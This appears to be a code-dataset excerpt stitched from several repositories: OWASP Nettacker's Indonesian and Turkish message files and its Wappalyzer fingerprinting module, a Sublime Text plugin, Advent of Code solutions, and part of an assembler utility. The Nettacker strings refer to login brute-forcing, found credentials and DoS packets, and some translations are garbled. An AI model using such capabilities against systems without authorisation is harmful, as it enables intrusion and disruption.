"user_pass_found": "pengguna: {0} lulus: {1} host: {2} port: {3} ditemukan!",
"file_listing_error": "(TIDAK ADA IZIN UNTUK DAFTAR DAFTAR)",
"trying_message": "mencoba {0} dari {1} dalam proses {2} dari {3} {4}: {5} ({6})",
"smtp_connection_timeout": "koneksi smtp ke {0}: {1} timeout, skipping {2}: {3}",
"smtp_connection_failed": "koneksi smtp ke {0}: {1} gagal, melewati seluruh langkah [proses {2} {3}]! "
"akan ke langkah berikutnya",
"ssh_connection_timeout": "koneksi ssh ke {0}: {1} timeout, skipping {2}: {3}",
"ssh_connection_failed": "koneksi ssh ke {0}: {1} gagal, melewati seluruh langkah [proses {2} {3}]!"
" akan ke langkah berikutnya",
"port/type": "{0} / {1}",
"port_found": "host: {0} port: {1} ({2}) ditemukan!",
"target_submitted": "target {0} dikirimkan!",
"current_version": "Anda menjalankan OWASP Nettacker versi {0} {1} {2} {6} dengan nama kode {3} {4} {5}",
"feature_unavailable": "fitur ini belum tersedia! silakan jalankan \"git clone "
"https://github.com/viraintel/OWASP-Nettacker.git atau install pip -U"
" OWASP-Nettacker untuk mendapatkan versi terakhir.",
"available_graph": "membangun grafik dari semua aktivitas dan informasi, Anda harus menggunakan "
"output HTML. grafik yang tersedia: {0}",
"graph_output": "untuk menggunakan fitur grafik, nama file output Anda harus diakhiri dengan "
"\".html\" atau \".htm\"!",
"build_graph": "membangun grafik ...",
"finish_build_graph": "selesaikan grafik bangunan!",
"pentest_graphs": "Grafik Pengujian Penetrasi",
"graph_message": "Grafik ini dibuat oleh OWASP Nettacker. Grafik berisi semua kegiatan modul, "
"peta jaringan, dan informasi sensitif. Jangan bagikan file ini dengan siapa pun "
"jika tidak dapat diandalkan.",
"nettacker_report": "Laporan OWASP Nettacker",
"nettacker_version_details": "Detail Perangkat Lunak: OWASP Nettacker versi {0} [{1}] di {2}",
"no_open_ports": "tidak ada port terbuka ditemukan!",
"no_user_passwords": "tidak ada pengguna / kata sandi yang ditemukan!",
"loaded_modules": "{0} modul dimuat ...",
"graph_module_404": "modul grafik ini tidak ditemukan: {0}",
"graph_module_unavailable": "modul grafik ini \"{0}\" tidak tersedia",
"ping_before_scan": "ping sebelum memindai host",
"skipping_target": "melewatkan seluruh target {0} dan metode pemindaian {1} karena "
"--ping-before-scan adalah benar dan tidak ada respon!",
"not_last_version": "Anda tidak menggunakan versi terakhir OWASP Nettacker, harap perbarui.",
"cannot_update": "tidak dapat memeriksa pembaruan, periksa koneksi internet Anda.",
"last_version": "Anda menggunakan versi terakhir OWASP Nettacker ...",
"directoy_listing": "daftar direktori ditemukan di {0}",
"insert_port_message": "tolong masukkan port melalui switch -g atau --methods-args sebagai ganti url",
"http_connection_timeout": "koneksi http {0} timeout!",
"wizard_mode": "mulai mode wizard",
"directory_file_404": "tidak ada direktori atau file yang ditemukan untuk {0} di port {1}",
"open_error": "tidak dapat membuka {0}",
"dir_scan_get": "nilai dir_scan_http_method harus GET atau HEAD, atur default ke GET.",
"list_methods": "daftar semua metode args",
"module_args_error": "tidak bisa mendapatkan argumen modul {0}",
"trying_process": "mencoba {0} dari {1} dalam proses {2} dari {3} pada {4} ({5})",
"domain_found": "domain ditemukan: {0}",
"TIME": "WAKTU",
"CATEGORY": "KATEGORI",
"module_pattern_404": "tidak dapat menemukan modul apa pun dengan pola {0}!",
"enter_default": "masukkan {0} | Default [{1}]>",
"enter_choices_default": "masukkan {0} | pilihan [{1}] | Default [{2}]>",
"all_targets": "targetnya",
"all_thread_numbers": "nomor utas",
"out_file": "nama file keluaran",
"all_scan_methods": "metode pemindaian",
"all_scan_methods_exclude": "metode pemindaian untuk dikecualikan",
"all_usernames": "nama pengguna",
"all_passwords": "<PASSWORD>",
"timeout_seconds": "batas waktu detik",
"all_ports": "nomor port",
"all_verbose_level": "tingkat verbose",
"all_socks_proxy": "proxy kaus kaki",
"retries_number": "nomor retries",
"graph": "sebuah grafik",
"subdomain_found": "subdomain ditemukan: {0}",
"select_profile": "pilih profil {0}",
"profile_404": "profil \"{0}\" tidak ditemukan!",
"waiting": "menunggu {0}",
"vulnerable": "rentan terhadap {0}",
"target_vulnerable": "target {0}: {1} rentan terhadap {2}!",
"no_vulnerability_found": "tidak ditemukan kerentanan! ({0})",
"Method": "metode",
"API": "API",
"API_options": "Opsi API",
"start_API": "memulai layanan API",
"API_host": "Alamat host API",
"API_port": "Nomor port API",
"API_debug": "Mode debug API",
"API_access_key": "Kunci akses API",
"white_list_API": "cukup izinkan host daftar putih untuk terhubung ke API",
"define_whie_list": "mendefinisikan host daftar putih, terpisah dengan, (contoh: 127.0.0.1, "
"192.168.0.1/24, 10.0.0.1-10.0.0.255)",
"gen_API_access_log": "menghasilkan log akses API",
"API_access_log_file": "Nama file log akses API",
"API_port_int": "Port API harus berupa bilangan bulat!",
"unknown_ip_input": "jenis masukan tidak dikenal, jenis yang diterima adalah "
"SINGLE_IPv4, RANGE_IPv4, CIDR_IPv4",
"API_key": "* Kunci API: {0}",
"ports_int": "port harus berupa bilangan bulat! (mis. 80 || 80,1080 || 80,1080-1300,9000,12000-15000)",
"through_API": "Melalui API OWASP Nettacker",
"API_invalid": "kunci API tidak valid",
"unauthorized_IP": "IP Anda tidak diotorisasi",
"not_found": "Tidak ditemukan!",
"no_subdomain_found": "subdomain_scan: tidak ada subdomain yang ditemukan!",
"viewdns_domain_404": "viewdns_reverse_ip_lookup_scan: tidak ada domain yang ditemukan!",
"browser_session_valid": "sesi browser Anda valid",
"browser_session_killed": "sesi browser Anda terbunuh",
"updating_database": "memperbarui basis data ...",
"database_connect_fail": "tidak bisa terhubung ke database!",
"inserting_report_db": "memasukkan laporan ke database",
"inserting_logs_db": "memasukkan log ke database",
"removing_logs_db": "menghapus log lama dari db",
"len_subdomain_found": "{0} subdomain (s) ditemukan!",
"len_domain_found": "{0} domain (s) ditemukan!",
"phpmyadmin_dir_404": "tidak ada dir phpmyadmin ditemukan!",
"DOS_send": "mengirim paket DoS ke {0}",
"host_up": "{0} sudah habis! Waktu yang diambil untuk melakukan ping kembali adalah {1}",
"host_down": "Tidak bisa melakukan ping {0}!",
"root_required": "ini harus dijalankan sebagai root",
"admin_scan_get": "admin_scan_http_method value harus GET atau HEAD, atur default ke GET.",
"telnet_connection_timeout": "koneksi telnet ke {0}: {1} timeout, skipping {2}: {3}",
"telnet_connection_failed": "koneksi telnet ke {0}: {1} gagal, melewati seluruh langkah [proses "
"{2} dari {3}]! akan ke langkah berikutnya",
"http_auth_success": "sukses otentikasi dasar http - host: {2}: {3}, pengguna: {0}, lulus: {1} ditemukan!",
"http_auth_failed": "Otentikasi dasar http gagal {0}: {3} menggunakan {1}: {2}",
"http_form_auth_success": "keberhasilan otentikasi bentuk http - host: {2}: {3},"
" pengguna: {0}, lulus: {1} ditemukan!",
"http_form_auth_failed": "Otentikasi bentuk http gagal {0}: {3} menggunakan {1}: {2}",
"http_ntlm_success": "Keberhasilan autentikasi ntlm http: host: {2}: {3}, pengguna: "
"{0}, lulus: {1} ditemukan!",
"http_ntlm_failed": "Otentikasi ntlm http gagal {0}: {3} menggunakan {1}: {2}",
"no_response": "tidak bisa mendapatkan respons dari target",
"category_framework": "kategori: {0}, kerangka kerja: {1} ditemukan!",
"nothing_found": "tidak ditemukan apa pun di {0} dalam {1}!",
"no_auth": "Tidak ada auth yang ditemukan pada {0}: {1}"
}
```
#### File: lib/language/messages_tr.py
```python
def all_messages():
"""
keep all messages in tr
Returns:
all messages in JSON
"""
return \
{
"scan_started": "Nettacker motoru başladı ...",
"options": "python nettacker.py [seçenekler]",
"help_menu": "Nettacker Yardım Menüsünü Göster",
"license": "Lütfen lisans ve sözleşmeleri okuyun https://github.com/viraintel/OWASP-Nettacker",
"engine": "Motor",
"engine_input": "Motor girişi seçenekleri",
"select_language": "bir dil seçin {0}",
"range": "tüm IP'leri aralıkta tara",
"subdomains": "alt alanları bul ve tara",
"thread_number_connections": "Bir ana bilgisayara bağlantı için iş parçacığı numaraları",
"thread_number_hosts": "tarama konakları için iş parçacığı numaraları",
"save_logs": "tüm kayıtları dosyaya kaydet (results.txt, results.html, results.json)",
"target": "Hedef",
"target_input": "Hedef giriş seçenekleri",
"target_list": "hedef (ler) listesi, \",\" ile ayrı",
"read_target": "dosyadan hedef (ler) oku",
"scan_method_options": "Tarama yöntemi seçenekleri",
"choose_scan_method": "tarama yöntemini seçin {0}",
"exclude_scan_method": "{0} öğesini hariç tutmak için tarama yöntemini seçin",
"username_list": "kullanıcı adı (lar) listesi, \",\" ile ayrı",
"username_from_file": "dosyadan kullanıcı adlarını oku",
"password_seperator": "şifre listesi \",\" ile ayrı",
"read_passwords": "<PASSWORD> şifre (ler) oku",
"port_seperator": "port (lar) listesi, \",\" ile ayrı",
"time_to_sleep": "her istek arasında uyumak için zaman",
"error_target": "Hedef (ler) belirtilemiyor",
"error_target_file": "Dosya açılamayan hedef (ler) belirtilemiyor: {0}",
"thread_number_warning": "100'den daha düşük iplik numarası kullanmak daha iyi, BTW devam ediyor ...",
"set_timeout": "zaman aşımını {0} saniye olarak ayarlayın, çok büyük değil mi? devam ettikçe ...",
"scan_module_not_found": "bu tarama modülü [{0}] bulunamadı!",
"error_exclude_all": "tüm tarama yöntemlerini hariç tutamazsınız",
"exclude_module_error": "hariç tutmak için seçtiğiniz {0} modülü bulunamadı!",
"method_inputs": "yöntem girişlerini girin, örneğin: ftp_brute_users = test, admin & ftp_brute_passwds "
"= read_from_file: /tmp/pass.txt&ftp_brute_port=21",
"error_reading_file": "{0} dosyası okunamıyor",
"error_username": "Dosya açılamayan kullanıcı adı (lar) belirtilemez: {0}",
"found": "{0} bulundu! ({1}: {2})",
"error_password_file": "Dosya açılamayan şifre (ler) belirtilemez: {0}",
"file_write_error": "\"{0}\" dosyası yazılabilir değil!",
"scan_method_select": "lütfen tarama yönteminizi seçin!",
"remove_temp": "geçici dosyaları kaldırarak!",
"sorting_results": "sıralama sonuçları!",
"done": "bitmiş!",
"start_attack": "{0}, {1} arasında {1} saldırmaya başlama",
"module_not_available": "\"{0}\" bu modül mevcut değil",
"error_platform": "ne yazık ki yazılımın bu sürümü sadece linux / osx / windows üzerinde çalıştırılabilir.",
"python_version_error": "Python sürümünüz desteklenmiyor!",
"skip_duplicate_target": "yinelenen hedefi atla (bazı alt alanlar / alan adları aynı IP'ye ve "
"Aralıklara sahip olabilir)",
"unknown_target": "bilinmeyen hedef türü [{0}]",
"checking_range": "{0} aralığında kontrol ediliyor ...",
"checking": "{0} kontrol ediliyor ...",
"HOST": "HOST",
"USERNAME": "K<NAME>",
"PASSWORD": "<PASSWORD>",
"PORT": "LİMAN",
"TYPE": "TİP",
"DESCRIPTION": "AÇIKLAMA",
"verbose_level": "ayrıntılı mod düzeyi (0-5) (varsayılan 0)",
"software_version": "yazılım sürümünü göster",
"check_updates": "güncellemeleri kontrol ediniz",
"outgoing_proxy": "giden bağlantılar proxy'si (socks). örnek socks5: 127.0.0.1: 9050, çorap: //127.0.0.1:"
" 9050 socks5: //127.0.0.1: 9050 veya socks4: çorap4: //127.0.0.1: 9050, kimlik"
" doğrulama: çorap: // kullanıcı adı: şifre @ 127.0.0.1, socks4: // kullanıcı adı:"
" [email protected], socks5: // kullanıcı adı: [email protected]",
"valid_socks_address": "lütfen geçerli bir çorap adresi ve port giriniz. örnek socks5: 127.0.0.1: 9050,"
" çorap: //127.0.0.1: 9050, çorap5: //127.0.0.1: 9050 veya çorap4: çorap4: "
"//127.0.0.1: 9050, kimlik doğrulama: çorap: // kullanıcı adı: şifre @ 127.0.0.1, "
"socks4: // kullanıcı adı: [email protected], socks5: // kullanıcı adı: "
"[email protected]",
"connection_retries": "Bağlantı zaman aşımı olduğunda tekrar dener (varsayılan 3)",
"ftp_connection_timeout": "{0} ile ftp bağlantısı: {1} zaman aşımı, {2} atlama: {3}",
"login_successful": "BAŞARIYLA GİRİŞ YAPTI!",
"login_list_error": "BAŞARILI OLMAK ÜZERE, LİSANS KOMİSYONU İÇİN İZİN VERİLDİ!",
"ftp_connection_failed": "{0} için ftp bağlantısı: {1} başarısız oldu, tüm adımı atladım {süreç {2}} "
"{2}]! bir sonraki adıma geçmek",
"input_target_error": "{0} modülü için giriş hedefi {1} atlama, DOMAIN, HTTP veya SINGLE_IPv4 olmalıdır",
"user_pass_found": "user: {0} pass: {1} host: {2} bağlantı noktası: {3} bulundu!",
"file_listing_error": "(LİSTE DOSYALARI İÇİN İZİN YOK)",
"trying_message": "{3} {4}: {5} ({6}) 'daki {2} sürecindeki {1} hesabının {0} değerini denemek",
"smtp_connection_timeout": "{0} için smtp bağlantısı: {1} zaman aşımı, {2} atlama: {3}",
"smtp_connection_failed": "{0} için smtp bağlantısı: {1} başarısız oldu, tüm adımı atla {süreç {2}} {2}]!"
" bir sonraki adıma geçmek",
"ssh_connection_timeout": "{0} ile ssh bağlantısı: {1} zaman aşımı, {2} atlama: {3}",
"ssh_connection_failed": "{0} için ssh bağlantısı: {1} başarısız oldu, tüm adımı atladı {süreç {2} {2}]!"
" bir sonraki adıma geçmek",
"port/type": "{0} / {1}",
"port_found": "host: {0} port: {1} ({2}) bulundu!",
"target_submitted": "{0} hedefi gönderildi!",
"current_version": "{0} {1} {2} {6} OWASP Nettacker sürümünü {3} {4} {5} kod adıyla çalıştırıyorsunuz",
"feature_unavailable": "Bu özellik henüz mevcut değil! son sürümü almak için lütfen git klon "
"https://github.com/viraintel/OWASP-Nettacker.git veya pip install -U"
" OWASP-Nettacker çalıştırın.",
"available_graph": "Tüm aktiviteler ve bilgiler için bir grafik oluşturmak, HTML çıkışı kullanmalısınız."
" mevcut grafikler: {0}",
"graph_output": "Grafik özelliğini kullanmak için çıktı dosya adınız \".html\" veya \".htm\" "
"ile bitmelidir!",
"build_graph": "bina grafiği ...",
"finish_build_graph": "bina grafiğini bitir!",
"pentest_graphs": "Sızma Test Grafikleri",
"graph_message": "Bu grafik OWASP Nettacker tarafından oluşturuldu. Grafik tüm modül aktivitelerini, "
"ağ haritasını ve hassas bilgileri içerir. Lütfen güvenilir değilse, bu dosyayı "
"kimseyle paylaşmayın.",
"nettacker_report": "OWASP Nettacker Raporu",
"nettacker_version_details": "Yazılım Ayrıntıları: {2} içindeki OWASP Nettacker sürümü {0} [{1}]",
"no_open_ports": "açık bağlantı noktası bulunamadı!",
"no_user_passwords": "kull<PASSWORD>cı / ş<PASSWORD> bulunamadı!",
"loaded_modules": "{0} modül yüklendi ...",
"graph_module_404": "Bu grafik modülü bulunamadı: {0}",
"graph_module_unavailable": "bu \"{0}\" grafik modülü mevcut değil",
"ping_before_scan": "ana bilgisayarı taramadan önce ping",
"skipping_target": "Taramadan önce --ping -ping gerçek olduğundan ve yanıt vermediğinden {0} hedefleme "
"yöntemini ve {1} tarama yöntemini atlıyor!",
"not_last_version": "OWASP Nettacker'ın son sürümünü kullanmıyorsunuz, lütfen güncelleyin.",
"cannot_update": "güncellemeyi kontrol edemezsiniz, lütfen internet bağlantınızı kontrol edin.",
"last_version": "OWASP Nettacker'ın son sürümünü kullanıyorsunuz ...",
"directoy_listing": "dizin girişi {0} bulundu",
"insert_port_message": "lütfen URL yerine -g veya --methods-args anahtarından bağlantı noktası ekleyin",
"http_connection_timeout": "http bağlantısı {0} zaman aşımı!",
"wizard_mode": "sihirbaz modunu başlat",
"directory_file_404": "{1} numaralı bağlantı noktasında {0} için dizin veya dosya bulunamadı",
"open_error": "{0} açılamıyor",
"dir_scan_get": "dir_scan_http_method değeri GET veya HEAD olmalı, varsayılanı "
"GET olarak ayarlanmış olmalıdır.",
"list_methods": "tüm yöntemleri listeler",
"module_args_error": "{0} modül hatalarını alamıyor",
"trying_process": "{3} tarihinde {1} {1} tarihinde {1} {0} tarihinde {4} {5} tarihinde {0} denemeyi",
"domain_found": "alan bulundu: {0}",
"TIME": "ZAMAN",
"CATEGORY": "KATEGORİ",
"module_pattern_404": "{0} desenli bir modül bulamıyor!",
"enter_default": "lütfen {0} girin Varsayılan [{1}]>",
"enter_choices_default": "lütfen {0} girin seçimler [{1}] | Varsayılan [{2}]>",
"all_targets": "hedefler",
"all_thread_numbers": "iş parçacığı numarası",
"out_file": "çıktı dosya adı",
"all_scan_methods": "tarama yöntemleri",
"all_scan_methods_exclude": "dışlamak için tarama yöntemleri",
"all_usernames": "kullanıcı adları",
"all_passwords": "<PASSWORD>",
"timeout_seconds": "zaman aşımı saniye",
"all_ports": "port numaraları",
"all_verbose_level": "ayrıntılı seviye",
"all_socks_proxy": "çorap vekil",
"retries_number": "yeniden deneme sayısı",
"graph": "grafik",
"subdomain_found": "alt alan bulundu: {0}",
"select_profile": "profil seç {0}",
"profile_404": "\"{0}\" profili bulunamadı!",
"waiting": "{0} için bekliyor",
"vulnerable": "{0} için savunmasız",
"target_vulnerable": "{0} hedefi: {1}, {2} için savunmasız!",
"no_vulnerability_found": "hiçbir güvenlik açığı bulunamadı! ({0})",
"Method": "Yöntem",
"API": "API",
"API_options": "API seçenekleri",
"start_API": "API hizmetini başlat",
"API_host": "API ana bilgisayar adresi",
"API_port": "API bağlantı noktası numarası",
"API_debug": "API hata ayıklama modu",
"API_access_key": "API erişim anahtarı",
"white_list_API": "API'ye bağlanmak için beyaz liste ana bilgisayarlarına izin ver",
"define_whie_list": "ile beyaz liste konaklarını tanımlar, (örnek: 127.0.0.1, 192.168.0.1/24, "
"10.0.0.1-10.0.0.255)",
"gen_API_access_log": "API erişim günlüğü oluştur",
"API_access_log_file": "API erişim günlüğü dosya adı",
"API_port_int": "API portu bir tamsayı olmalı!",
"unknown_ip_input": "bilinmeyen giriş türü, kabul edilen türler SINGLE_IPv4, RANGE_IPv4, "
"CIDR_IPv4 şeklindedir.",
"API_key": "* API Anahtarı: {0}",
"ports_int": "portlar tamsayı olmalıdır! (ör. 80, 80, 1080, 80, 1080-1300, 9000, 12000-15000)",
"through_API": "OWASP Nettacker API'sı aracılığıyla",
"API_invalid": "geçersiz API anahtarı",
"unauthorized_IP": "IP'niz yetkili değil",
"not_found": "Bulunamadı!",
"no_subdomain_found": "subdomain_scan: alt alan adı bulunamadı!",
"viewdns_domain_404": "viewdns_reverse_ip_lookup_scan: alan adı bulunamadı!",
"browser_session_valid": "tarayıcınızın oturumu geçerli",
"browser_session_killed": "tarayıcı oturumunuz öldürüldü",
"updating_database": "veritabanını güncellemek ...",
"database_connect_fail": "Veritabanına bağlanılamadı!",
"inserting_report_db": "raporu veritabanına eklemek",
"inserting_logs_db": "günlükleri veritabanına eklemek",
"removing_logs_db": "eski günlükleri db'den kaldırma",
"len_subdomain_found": "{0} alt alan bulundu!",
"len_domain_found": "{0} alan (lar) bulundu!",
"phpmyadmin_dir_404": "phpmyadmin dir bulunamadı!",
"DOS_send": "DoS paketlerini {0} adresine göndermek",
"host_up": "{0} doldu! Geri ping atma zamanı {1}",
"host_down": "{0} ping edilemiyor!",
"root_required": "bunun kök olarak çalıştırılması gerekiyor",
"admin_scan_get": "admin_scan_http_method değeri GET veya HEAD olmalı, varsayılanı GET olarak"
" ayarlanmış olmalıdır.",
"telnet_connection_timeout": "{0} ile telnet bağlantısı: {1} zaman aşımı, {2} atlama: {3}",
"telnet_connection_failed": "{0} ile telnet bağlantısı: {1} başarısız oldu, tüm adımı atladı {süreç "
"{2}} {2}]! bir sonraki adıma geçmek",
"http_auth_success": "http temel kimlik doğrulama başarısı - ana bilgisayar: {2}: {3}, kullanıcı: "
"{0}, pass: {1} bulundu!",
"http_auth_failed": "http temel kimlik doğrulaması {0} tarihinde başarısız oldu: {3} {1} kullanarak: {2}",
"http_form_auth_success": "http formu kimlik doğrulama başarısı - ana bilgisayar: {2}: {3}, kullanıcı: "
"{0}, pass: {1} bulundu!",
"http_form_auth_failed": "http formu kimlik doğrulaması {0} için başarısız oldu: {3} {1} kullanarak: {2}",
"http_ntlm_success": "http ntlm kimlik doğrulama başarısı - ana bilgisayar: {2}: {3}, kullanıcı: "
"{0}, pass: {1} bulundu!",
"http_ntlm_failed": "http ntlm kimlik doğrulaması {0} tarihinde başarısız oldu: {3} {1} kullanarak: {2}",
"no_response": "hedeften cevap alamıyor",
"category_framework": "kategori: {0}, çerçeveler: {1} bulundu!",
"nothing_found": "{1} 'de {0} tarihinde hiçbir şey bulunamadı!",
"no_auth": "{0} tarihinde hiçbir kimlik bulunamadı: {1}"
}
```
#### File: scan/wappalyzer/engine.py
```python
import json
import re
import pkg_resources
import requests
from bs4 import BeautifulSoup
import threading
import string
import random
import time
import socket
import socks
from core.alert import *
from core.targets import target_type
from core.targets import target_to_host
from core.load_modules import load_file_path
from lib.socks_resolver.engine import getaddrinfo
from core._time import now
from core.log import __log_into_file
from core.compatible import version
def extra_requirements_dict():
return {}
def _parse_webpage(target, timeout_sec, language, retries, socks_proxy, scan_cmd, scan_id):
webpage = {}
tries = 0
if socks_proxy is not None:
socks_version = socks.SOCKS5 if socks_proxy.startswith(
'socks5://') else socks.SOCKS4
socks_proxy = socks_proxy.rsplit('://')[1]
if '@' in socks_proxy:
socks_username = socks_proxy.rsplit(':')[0]
socks_password = socks_proxy.rsplit(':')[1].rsplit('@')[0]
socks.set_default_proxy(socks_version, str(socks_proxy.rsplit('@')[1].rsplit(':')[0]),
int(socks_proxy.rsplit(':')[-1]), username=socks_username,
password=<PASSWORD>)
socket.socket = socks.socksocket
socket.getaddrinfo = getaddrinfo
else:
socks.set_default_proxy(socks_version, str(
socks_proxy.rsplit(':')[0]), int(socks_proxy.rsplit(':')[1]))
socket.socket = socks.socksocket
socket.getaddrinfo = getaddrinfo
try:
if timeout_sec is not None:
response = requests.get(target, timeout=timeout_sec)
else:
response = requests.get(target)
webpage['url'] = response.url
webpage['headers'] = response.headers
webpage['response'] = response.text
webpage['html'] = BeautifulSoup(response.text, 'html.parser')
webpage['scripts'] = [script['src']
for script in webpage['html'].findAll('script', src=True)]
webpage['metatags'] = {meta['name'].lower(): meta['content']
for meta in webpage['html'].findAll('meta', attrs=dict(name=True, content=True))}
return webpage
except:
tries += 1
if tries >= retries:
info(messages(language, "no_response"))
return
def _prepare_app(app):
for key in ['url', 'html', 'script', 'implies']:
try:
value = app[key]
except KeyError:
app[key] = []
else:
if not isinstance(value, list):
app[key] = [value]
for key in ['headers', 'meta']:
try:
value = app[key]
except KeyError:
app[key] = {}
obj = app['meta']
if not isinstance(obj, dict):
app['meta'] = {'generator': obj}
for key in ['headers', 'meta']:
obj = app[key]
app[key] = {k.lower(): v for k, v in obj.items()}
for key in ['url', 'html', 'script']:
app[key] = [_prepare_pattern(pattern) for pattern in app[key]]
for key in ['headers', 'meta']:
obj = app[key]
for name, pattern in obj.items():
obj[name] = _prepare_pattern(obj[name])
def _prepare_pattern(pattern):
regex, _, rest = pattern.partition('\\;')
try:
return re.compile(regex, re.I)
except re.error as e:
# regex that never matches:
# http://stackoverflow.com/a/1845097/413622
return re.compile(r'(?!x)x')
def _has_app(app, webpage):
try:
for regex in app['url']:
if regex.search(webpage['url']):
return True
for name, regex in app['headers'].items():
if name in webpage['headers']:
content = webpage['headers'][name]
if regex.search(content):
return True
for regex in app['script']:
for script in webpage['scripts']:
if regex.search(script):
return True
for name, regex in app['meta'].items():
if name in webpage['metatags']:
content = webpage['metatags'][name]
if regex.search(content):
return True
for regex in app['html']:
if regex.search(webpage['response']):
return True
except:
pass
def _get_implied_apps(detected_apps, apps1):
def __get_implied_apps(detect, apps):
_implied_apps = set()
for detected in detect:
try:
_implied_apps.update(set(apps[detected]['implies']))
except KeyError:
pass
return _implied_apps
implied_apps = __get_implied_apps(detected_apps, apps1)
all_implied_apps = set()
while not all_implied_apps.issuperset(implied_apps):
all_implied_apps.update(implied_apps)
implied_apps = __get_implied_apps(all_implied_apps, apps1)
return all_implied_apps
def analyze(target, timeout_sec, log_in_file, language,
time_sleep, thread_tmp_filename, retries,
socks_proxy, scan_id, scan_cmd):
webpage = _parse_webpage(
target, timeout_sec, language, retries, socks_proxy, scan_cmd, scan_id)
obj = json.loads(pkg_resources.resource_string(__name__, "apps.json").decode()
if version() is 3 else pkg_resources.resource_string(__name__, "apps.json"))
apps = obj['apps']
detected = []
for app_name, app in apps.items():
_prepare_app(app)
if _has_app(app, webpage):
detected.append(app_name)
detected = set(detected).union(_get_implied_apps(detected, apps))
category_wise = {}
for app_name in detected:
cats = apps[app_name]['cats']
for cat in cats:
category_wise[app_name] = obj['categories'][str(cat)]['name']
inv_map = {}
for k, v in category_wise.items():
inv_map[v] = inv_map.get(v, [])
inv_map[v].append(k)
for x in inv_map.items():
info(messages(language, "category_framework").format(
x[0], ', '.join(x[1])))
data = json.dumps(
{'HOST': target_to_host(target), 'USERNAME': '', 'PASSWORD': '', 'PORT': '', 'TYPE': 'wappalyzer_scan',
'DESCRIPTION': x[0] + ': ' + ', '.join(x[1]), 'TIME': now(), 'CATEGORY': "scan", 'SCAN_ID': scan_id,
'SCAN_CMD': scan_cmd})
__log_into_file(log_in_file, 'a', data, language)
def start(target, users, <PASSWORD>wds, ports, timeout_sec, thread_number, num, total, log_in_file, time_sleep, language,
verbose_level, socks_proxy, retries, methods_args, scan_id, scan_cmd): # Main function
if target_type(target) != 'SINGLE_IPv4' or target_type(target) != 'DOMAIN' or target_type(
target) != 'HTTP' or target_type(target) != 'SINGLE_IPv6':
threads = []
thread_tmp_filename = '{}/tmp/thread_tmp_'.format(load_file_path()) + ''.join(
random.choice(string.ascii_letters + string.digits) for _ in range(20))
__log_into_file(thread_tmp_filename, 'w', '1', language)
trying = 0
total_req = 8000
if target_type(target) != "HTTP":
target = 'http://' + target
t = threading.Thread(target=analyze,
args=(
target, timeout_sec, log_in_file, language,
time_sleep, thread_tmp_filename, retries,
socks_proxy, scan_id, scan_cmd))
threads.append(t)
t.start()
trying += 1
if verbose_level > 3:
info(messages(language, "trying_message").format(trying, total_req, num, total, target_to_host(target),
"", 'dir_scan'))
while 1:
try:
if threading.activeCount() >= thread_number:
time.sleep(0.01)
else:
break
except KeyboardInterrupt:
break
# wait for threads
kill_switch = 0
kill_time = int(
timeout_sec / 0.1) if int(timeout_sec / 0.1) is not 0 else 1
while 1:
time.sleep(0.1)
kill_switch += 1
try:
if threading.activeCount() is 1 or kill_switch is kill_time:
break
except KeyboardInterrupt:
break
thread_write = int(open(thread_tmp_filename).read().rsplit()[0])
if thread_write is 1:
info(messages(language, "nothing_found").format(
target, "wappalyzer_scan"))
if verbose_level is not 0:
data = json.dumps({'HOST': target_to_host(target), 'USERNAME': '', 'PASSWORD': '', 'PORT': '', 'TYPE': 'wappalyzer_scan',
'DESCRIPTION': messages(language, "not_found"), 'TIME': now(), 'CATEGORY': "scan", 'SCAN_ID': scan_id,
'SCAN_CMD': scan_cmd})
__log_into_file(log_in_file, 'a', data, language)
os.remove(thread_tmp_filename)
else:
warn(messages(language, "input_target_error").format(
'wappalyzer_scan', target))
``` |
{
"source": "0x4445565A/instacodes-sublimetext-plugin",
"score": 3
} |
#### File: 0x4445565A/instacodes-sublimetext-plugin/instacodes.py
```python
import sublime, sublime_plugin, re, urllib, webbrowser
class SelectionToInstacodeCommand(sublime_plugin.TextCommand):
def run(self, edit):
sel = self.view.sel()[0]
if not sel.empty():
selection = urllib.parse.quote_plus(self.view.substr(sel))
syntax = re.search('\/.*\/', self.view.settings().get('syntax')).group(0).replace('/', '')
sendToBrowser(selection, syntax)
else:
sublime.error_message('No code was selected. InstaCod.es post failed.')
class FileToInstacodeCommand(sublime_plugin.TextCommand):
def run(self, edit):
selection = urllib.parse.quote_plus(self.view.substr(self.view.visible_region()))
syntax = re.search('\/.*\/', self.view.settings().get('syntax')).group(0).replace('/', '')
sendToBrowser(selection, syntax)
def sendToBrowser(code, syntax):
webbrowser.open('http://instaco.de/?post_code=' + code + '&post_lang=' + syntax)
``` |
{
"source": "0x4448/advent-of-code",
"score": 4
} |
#### File: advent-of-code/2015/day01.py
```python
def get_floor(chars: str) -> int:
floor = 0
for char in chars:
if char == "(":
floor += 1
elif char == ")":
floor -= 1
return floor
def get_basement_position(chars: str) -> int:
floor = 0
for n, char in enumerate(chars):
if char == "(":
floor += 1
elif char == ")":
floor -= 1
if floor == -1:
return n + 1
```
#### File: advent-of-code/2015/day02.py
```python
def get_area(dimensions: str) -> int:
dimensions = dimensions.split("\n")
total = 0
for dim in dimensions:
l, w, h = sorted([int(n) for n in dim.split("x")])
# area of smallest side
total += l * w
total += 2 * l * w
total += 2 * w * h
total += 2 * l * h
return total
def get_length(dimensions: str) -> int:
dimensions = dimensions.split("\n")
total = 0
for dim in dimensions:
l, w, h = sorted([int(n) for n in dim.split("x")])
# perimeter of smallest face
total += 2 * l + 2 * w
# volume
total += l * w * h
return total
```
#### File: advent-of-code/2015/day04.py
```python
import hashlib
def md5(s: str) -> str:
h = hashlib.md5()
h.update(s.encode("utf-8"))
return h.hexdigest()
def mine_coin(key: str) -> int:
count = 1
while not md5(key + str(count)).startswith("000000"):
count += 1
return count
``` |
{
"source": "0x444d4d/SCC-assembler",
"score": 3
} |
#### File: SCC-assembler/SCC/SCCUtils.py
```python
import csv
import re
from SCCDicts import *
def writeList2File(fileName, list, append=0):
mode = ('w', 'a')[append]
with open(fileName, mode) as file:
for item in list:
file.write(f'{item}\n')
def isRegister(operand):
return registers[operand]
def isImm(operand):
if (operand[0] == 'b'):
if (len(operand[1:]) > 8):
raise Exception(f'Operand too large. Must be under 8 bits. Received {operand}')
else:
return operand[1:]
elif int(operand) > 255:
raise Exception(f'Operand too large. Must be under 8 bits. Received {operand}')
return format(int(operand), '08b')
def isOther(operand):
InPrepRules = False
if operand in prep_rules:
InPrepRules = True
return opType(prep_rules[operand])
if operand in directions:
if InPrepRules is True:
raise Exception(f'Operand {operand} used as an address tag and preprocessor rule')
